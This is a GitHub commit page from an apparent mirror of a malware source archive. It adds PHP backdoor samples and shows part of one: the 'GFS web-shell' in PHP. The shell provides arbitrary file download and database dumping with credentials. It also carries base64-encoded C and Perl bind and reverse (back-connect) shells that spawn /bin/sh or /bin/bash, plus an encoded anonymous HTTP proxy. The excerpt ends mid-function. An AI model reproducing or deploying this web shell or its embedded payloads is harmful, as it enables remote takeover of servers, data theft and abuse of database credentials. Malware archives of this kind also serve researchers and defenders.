ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground 2020-10-09 22:07:39 -05:00 committed by GitHub
parent 23c136b0eb
commit f5ec68af9b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
14 changed files with 13623 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1127
PHP/Backdoor.PHP.Agent.aq Normal file
View File

File diff suppressed because it is too large Load Diff

2735
PHP/Backdoor.PHP.Agent.ar Normal file
View File

File diff suppressed because it is too large Load Diff

2029
PHP/Backdoor.PHP.Agent.as Normal file
View File

File diff suppressed because one or more lines are too long

618
PHP/Backdoor.PHP.Agent.at Normal file
View File

@ -0,0 +1,618 @@
<?
/*
*************************
* ###### ##### ###### *
* ###### ##### ###### *
* ## ## ## *
* ## #### ###### *
* ## ## #### ###### *
* ## ## ## ## *
* ###### ## ###### *
* ###### ## ###### *
* *
* Group Freedom Search! *
*************************
GFS Web-Shell
*/
error_reporting(0);
if($_POST['b_down']){
$file=fopen($_POST['fname'],"r");
ob_clean();
$filename=basename($_POST['fname']);
$filedump=fread($file,filesize($_POST['fname']));
fclose($file);
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
if($_POST['b_dtable']){
$dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
if($dump!=""){
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
exit();
}else
die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
}
set_magic_quotes_runtime(0);
set_time_limit(0);
ini_set('max_execution_time',0);
ini_set('output_buffering',0);
if(version_compare(phpversion(), '4.1.0')==-1){
$_POST=&$HTTP_POST_VARS;
$_GET=&$HTTP_GET_VARS;
$_SERVER=&$HTTP_SERVER_VARS;
}
if (get_magic_quotes_gpc()){
foreach ($_POST as $k=>$v){
$_POST[$k]=stripslashes($v);
}
foreach ($_SERVER as $k=>$v){
$_SERVER[$k]=stripslashes($v);
}
}
if ($_POST['username']==""){
$_POST['username']="root";
}
////////////////////////////////////////////////////////////////////////////////
///////////////////////////// Ïåðåìåííûå ///////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
$r_act=$_POST['r_act'];
$safe_mode=ini_get('safe_mode'); //ñòàòóñ áåçîïàñíîãî ðåæèìà
$mysql_stat=function_exists('mysql_connect'); //Íàëè÷èå mysql
$curl_on=function_exists('curl_version'); //íàëè÷èå cURL
$dis_func=ini_get('disable_functions'); //çàáëîêèðîâàíûå ôóíêöèè
$HTML=<<<html
<html>
<head>
<title>GFS web-shell ver 3.1.7</title>
</head>
<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
html;
$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
lIENPTk47DQpleGl0IDA7DQp9DQp9";
$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
$port[1] = "tcpmux (TCP Port Service Multiplexer)";
$port[2] = "Management Utility";
$port[3] = "Compression Process";
$port[5] = "rje (Remote Job Entry)";
$port[7] = "echo";
$port[9] = "discard";
$port[11] = "systat";
$port[13] = "daytime";
$port[15] = "netstat";
$port[17] = "quote of the day";
$port[18] = "send/rwp";
$port[19] = "character generator";
$port[20] = "ftp-data";
$port[21] = "ftp";
$port[22] = "ssh, pcAnywhere";
$port[23] = "Telnet";
$port[25] = "SMTP (Simple Mail Transfer)";
$port[27] = "ETRN (NSW User System FE)";
$port[29] = "MSG ICP";
$port[31] = "MSG Authentication";
$port[33] = "dsp (Display Support Protocol)";
$port[37] = "time";
$port[38] = "RAP (Route Access Protocol)";
$port[39] = "rlp (Resource Location Protocol)";
$port[41] = "Graphics";
$port[42] = "nameserv, WINS";
$port[43] = "whois, nickname";
$port[44] = "MPM FLAGS Protocol";
$port[45] = "Message Processing Module [recv]";
$port[46] = "MPM [default send]";
$port[47] = "NI FTP";
$port[48] = "Digital Audit Daemon";
$port[49] = "TACACS, Login Host Protocol";
$port[50] = "RMCP, re-mail-ck";
$port[53] = "DNS";
$port[57] = "MTP (any private terminal access)";
$port[59] = "NFILE";
$port[60] = "Unassigned";
$port[61] = "NI MAIL";
$port[62] = "ACA Services";
$port[63] = "whois++";
$port[64] = "Communications Integrator (CI)";
$port[65] = "TACACS-Database Service";
$port[66] = "Oracle SQL*NET";
$port[67] = "bootps (Bootstrap Protocol Server)";
$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
$port[69] = "Trivial File Transfer Protocol (tftp)";
$port[70] = "Gopher";
$port[71] = "Remote Job Service";
$port[72] = "Remote Job Service";
$port[73] = "Remote Job Service";
$port[74] = "Remote Job Service";
$port[75] = "any private dial out service";
$port[76] = "Distributed External Object Store";
$port[77] = "any private RJE service";
$port[78] = "vettcp";
$port[79] = "finger";
$port[80] = "World Wide Web HTTP";
$port[81] = "HOSTS2 Name Serve";
$port[82] = "XFER Utility";
$port[83] = "MIT ML Device";
$port[84] = "Common Trace Facility";
$port[85] = "MIT ML Device";
$port[86] = "Micro Focus Cobol";
$port[87] = "any private terminal link";
$port[88] = "Kerberos, WWW";
$port[89] = "SU/MIT Telnet Gateway";
$port[90] = "DNSIX Securit Attribute Token Map";
$port[91] = "MIT Dover Spooler";
$port[92] = "Network Printing Protocol";
$port[93] = "Device Control Protocol";
$port[94] = "Tivoli Object Dispatcher";
$port[95] = "supdup";
$port[96] = "DIXIE";
$port[98] = "linuxconf";
$port[99] = "Metagram Relay";
$port[100] = "[unauthorized use]";
$port[101] = "HOSTNAME";
$port[102] = "ISO, X.400, ITOT";
$port[103] = "Genesis Point-to-Point";
$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
$port[105] = "CCSO name server protocol";
$port[106] = "poppassd";
$port[107] = "Remote Telnet Service";
$port[108] = "SNA Gateway Access Server";
$port[109] = "POP2";
$port[110] = "POP3";
$port[111] = "Sun RPC Portmapper";
$port[112] = "McIDAS Data Transmission Protocol";
$port[113] = "Authentication Service";
$port[115] = "sftp (Simple File Transfer Protocol)";
$port[116] = "ANSA REX Notify";
$port[117] = "UUCP Path Service";
$port[118] = "SQL Services";
$port[119] = "NNTP";
$port[120] = "CFDP";
$port[123] = "NTP";
$port[124] = "SecureID";
$port[129] = "PWDGEN";
$port[133] = "statsrv";
$port[135] = "loc-srv/epmap";
$port[137] = "netbios-ns";
$port[138] = "netbios-dgm (UDP)";
$port[139] = "NetBIOS";
$port[143] = "IMAP";
$port[144] = "NewS";
$port[150] = "SQL-NET";
$port[152] = "BFTP";
$port[153] = "SGMP";
$port[156] = "SQL Service";
$port[161] = "SNMP";
$port[175] = "vmnet";
$port[177] = "XDMCP";
$port[178] = "NextStep Window Server";
$port[179] = "BGP";
$port[180] = "SLmail admin";
$port[199] = "smux";
$port[210] = "Z39.50";
$port[213] = "IPX";
$port[218] = "MPP";
$port[220] = "IMAP3";
$port[256] = "RAP";
$port[257] = "Secure Electronic Transaction";
$port[258] = "Yak Winsock Personal Chat";
$port[259] = "ESRO";
$port[264] = "FW1_topo";
$port[311] = "Apple WebAdmin";
$port[350] = "MATIP type A";
$port[351] = "MATIP type B";
$port[363] = "RSVP tunnel";
$port[366] = "ODMR (On-Demand Mail Relay)";
$port[371] = "Clearcase";
$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
$port[389] = "LDAP";
$port[407] = "Timbuktu";
$port[427] = "Server Location";
$port[434] = "Mobile IP";
$port[443] = "ssl";
$port[444] = "snpp, Simple Network Paging Protocol";
$port[445] = "SMB";
$port[458] = "QuickTime TV/Conferencing";
$port[468] = "Photuris";
$port[475] = "tcpnethaspsrv";
$port[500] = "ISAKMP, pluto";
$port[511] = "mynet-as";
$port[512] = "biff, rexec";
$port[513] = "who, rlogin";
$port[514] = "syslog, rsh";
$port[515] = "lp, lpr, line printer";
$port[517] = "talk";
$port[520] = "RIP (Routing Information Protocol)";
$port[521] = "RIPng";
$port[522] = "ULS";
$port[531] = "IRC";
$port[543] = "KLogin, AppleShare over IP";
$port[545] = "QuickTime";
$port[548] = "AFP";
$port[554] = "Real Time Streaming Protocol";
$port[555] = "phAse Zero";
$port[563] = "NNTP over SSL";
$port[575] = "VEMMI";
$port[581] = "Bundle Discovery Protocol";
$port[593] = "MS-RPC";
$port[608] = "SIFT/UFT";
$port[626] = "Apple ASIA";
$port[631] = "IPP (Internet Printing Protocol)";
$port[635] = "RLZ DBase";
$port[636] = "sldap";
$port[642] = "EMSD";
$port[648] = "RRP (NSI Registry Registrar Protocol)";
$port[655] = "tinc";
$port[660] = "Apple MacOS Server Admin";
$port[666] = "Doom";
$port[674] = "ACAP";
$port[687] = "AppleShare IP Registry";
$port[700] = "buddyphone";
$port[705] = "AgentX for SNMP";
$port[901] = "swat, realsecure";
$port[993] = "s-imap";
$port[995] = "s-pop";
$port[1024] = "Reserved";
$port[1025] = "network blackjack";
$port[1062] = "Veracity";
$port[1080] = "SOCKS";
$port[1085] = "WebObjects";
$port[1227] = "DNS2Go";
$port[1243] = "SubSeven";
$port[1338] = "Millennium Worm";
$port[1352] = "Lotus Notes";
$port[1381] = "Apple Network License Manager";
$port[1417] = "Timbuktu Service 1 Port";
$port[1418] = "Timbuktu Service 2 Port";
$port[1419] = "Timbuktu Service 3 Port";
$port[1420] = "Timbuktu Service 4 Port";
$port[1433] = "Microsoft SQL Server";
$port[1434] = "Microsoft SQL Monitor";
$port[1477] = "ms-sna-server";
$port[1478] = "ms-sna-base";
$port[1490] = "insitu-conf";
$port[1494] = "Citrix ICA Protocol";
$port[1498] = "Watcom-SQL";
$port[1500] = "VLSI License Manager";
$port[1503] = "T.120";
$port[1521] = "Oracle SQL";
$port[1522] = "Ricardo North America License Manager";
$port[1524] = "ingres";
$port[1525] = "prospero";
$port[1526] = "prospero";
$port[1527] = "tlisrv";
$port[1529] = "oracle";
$port[1547] = "laplink";
$port[1604] = "Citrix ICA, MS Terminal Server";
$port[1645] = "RADIUS Authentication";
$port[1646] = "RADIUS Accounting";
$port[1680] = "Carbon Copy";
$port[1701] = "L2TP/LSF";
$port[1717] = "Convoy";
$port[1720] = "H.323/Q.931";
$port[1723] = "PPTP control port";
$port[1731] = "MSICCP";
$port[1755] = "Windows Media .asf";
$port[1758] = "TFTP multicast";
$port[1761] = "cft-0";
$port[1762] = "cft-1";
$port[1763] = "cft-2";
$port[1764] = "cft-3";
$port[1765] = "cft-4";
$port[1766] = "cft-5";
$port[1767] = "cft-6";
$port[1808] = "Oracle-VP2";
$port[1812] = "RADIUS server";
$port[1813] = "RADIUS accounting";
$port[1818] = "ETFTP";
$port[1973] = "DLSw DCAP/DRAP";
$port[1985] = "HSRP";
$port[1999] = "Cisco AUTH";
$port[2001] = "glimpse";
$port[2049] = "NFS";
$port[2064] = "distributed.net";
$port[2065] = "DLSw";
$port[2066] = "DLSw";
$port[2106] = "MZAP";
$port[2140] = "DeepThroat";
$port[2301] = "Compaq Insight Management Web Agents";
$port[2327] = "Netscape Conference";
$port[2336] = "Apple UG Control";
$port[2427] = "MGCP gateway";
$port[2504] = "WLBS";
$port[2535] = "MADCAP";
$port[2543] = "sip";
$port[2592] = "netrek";
$port[2727] = "MGCP call agent";
$port[2628] = "DICT";
$port[2998] = "ISS Real Secure Console Service Port";
$port[3000] = "Firstclass";
$port[3001] = "Redwood Broker";
$port[3031] = "Apple AgentVU";
$port[3128] = "squid";
$port[3130] = "ICP";
$port[3150] = "DeepThroat";
$port[3264] = "ccmail";
$port[3283] = "Apple NetAssitant";
$port[3288] = "COPS";
$port[3305] = "ODETTE";
$port[3306] = "mySQL";
$port[3389] = "RDP Protocol (Terminal Server)";
$port[3521] = "netrek";
$port[4000] = "icq, command-n-conquer and shell nfm";
$port[4321] = "rwhois";
$port[4333] = "mSQL";
$port[4444] = "KRB524";
$port[4827] = "HTCP";
$port[5002] = "radio free ethernet";
$port[5004] = "RTP";
$port[5005] = "RTP";
$port[5010] = "Yahoo! Messenger";
$port[5050] = "multimedia conference control tool";
$port[5060] = "SIP";
$port[5150] = "Ascend Tunnel Management Protocol";
$port[5190] = "AIM";
$port[5500] = "securid";
$port[5501] = "securidprop";
$port[5423] = "Apple VirtualUser";
$port[5555] = "Personal Agent";
$port[5631] = "PCAnywhere data";
$port[5632] = "PCAnywhere";
$port[5678] = "Remote Replication Agent Connection";
$port[5800] = "VNC";
$port[5801] = "VNC";
$port[5900] = "VNC";
$port[5901] = "VNC";
$port[6000] = "X Windows";
$port[6112] = "BattleNet";
$port[6502] = "Netscape Conference";
$port[6667] = "IRC";
$port[6670] = "VocalTec Internet Phone, DeepThroat";
$port[6699] = "napster";
$port[6776] = "Sub7";
$port[6970] = "RTP";
$port[7007] = "MSBD, Windows Media encoder";
$port[7070] = "RealServer/QuickTime";
$port[7777] = "cbt";
$port[7778] = "Unreal";
$port[7648] = "CU-SeeMe";
$port[7649] = "CU-SeeMe";
$port[8000] = "iRDMI/Shoutcast Server";
$port[8010] = "WinGate 2.1";
$port[8080] = "HTTP";
$port[8181] = "HTTP";
$port[8383] = "IMail WWW";
$port[8875] = "napster";
$port[8888] = "napster";
$port[8889] = "Desktop Data TCP 1";
$port[8890] = "Desktop Data TCP 2";
$port[8891] = "Desktop Data TCP 3: NESS application";
$port[8892] = "Desktop Data TCP 4: FARM product";
$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
$port[8894] = "Desktop Data TCP 6: COAL application";
$port[9000] = "CSlistener";
$port[10008] = "cheese worm";
$port[11371] = "PGP 5 Keyserver";
$port[13223] = "PowWow";
$port[13224] = "PowWow";
$port[14237] = "Palm";
$port[14238] = "Palm";
$port[18888] = "LiquidAudio";
$port[21157] = "Activision";
$port[22555] = "Vocaltec Web Conference";
$port[23213] = "PowWow";
$port[23214] = "PowWow";
$port[23456] = "EvilFTP";
$port[26000] = "Quake";
$port[27001] = "QuakeWorld";
$port[27010] = "Half-Life";
$port[27015] = "Half-Life";
$port[27960] = "QuakeIII";
$port[30029] = "AOL Admin";
$port[31337] = "Back Orifice";
$port[32777] = "rpc.walld";
$port[45000] = "Cisco NetRanger postofficed";
$port[32773] = "rpc bserverd";
$port[32776] = "rpc.spray";
$port[32779] = "rpc.cmsd";
$port[38036] = "timestep";
$port[40193] = "Novell";
$port[41524] = "arcserve discovery";
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
function rep_char($ch,$count) //Ïîâòîðåíèå ñèìâîëà
{
$res="";
